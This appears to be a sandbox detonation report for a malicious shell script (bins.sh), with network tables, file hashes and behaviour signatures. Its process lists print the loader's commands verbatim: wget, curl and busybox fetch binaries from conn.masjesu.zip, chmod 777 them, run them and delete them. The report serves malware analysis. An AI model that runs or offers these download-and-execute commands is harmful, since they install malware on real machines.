| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-10 01:01
Reported
2024-11-10 01:04
Platform
debian9-mipsel-20240611-en
Max time kernel
150s
Max time network
45s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO | /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO | N/A |
| N/A | /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J | /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J | N/A |
| N/A | /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv | /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv | N/A |
| N/A | /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 | /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 | N/A |
| N/A | /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt | /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt | N/A |
| N/A | /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV | /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV | N/A |
| N/A | /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B | /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B | N/A |
| N/A | /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc | /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc | N/A |
| N/A | /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR | /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR | N/A |
| N/A | /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 | /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 | N/A |
| N/A | /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y | /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B | /usr/bin/curl | N/A |
Processes
/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/bin/chmod
[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/bin/rm
[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/bin/chmod
[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/bin/rm
[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/bin/chmod
[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/bin/rm
[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/bin/chmod
[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/bin/rm
[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/bin/chmod
[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/bin/rm
[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/bin/chmod
[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/bin/rm
[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/bin/chmod
[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/bin/rm
[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/bin/chmod
[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/bin/rm
[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/bin/chmod
[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/bin/rm
[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/bin/chmod
[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/bin/rm
[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/bin/chmod
[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/bin/rm
[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-10 01:01
Reported
2024-11-10 01:04
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-10 01:01
Reported
2024-11-10 01:04
Platform
debian9-armhf-20240418-en
Max time kernel
149s
Max time network
2s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |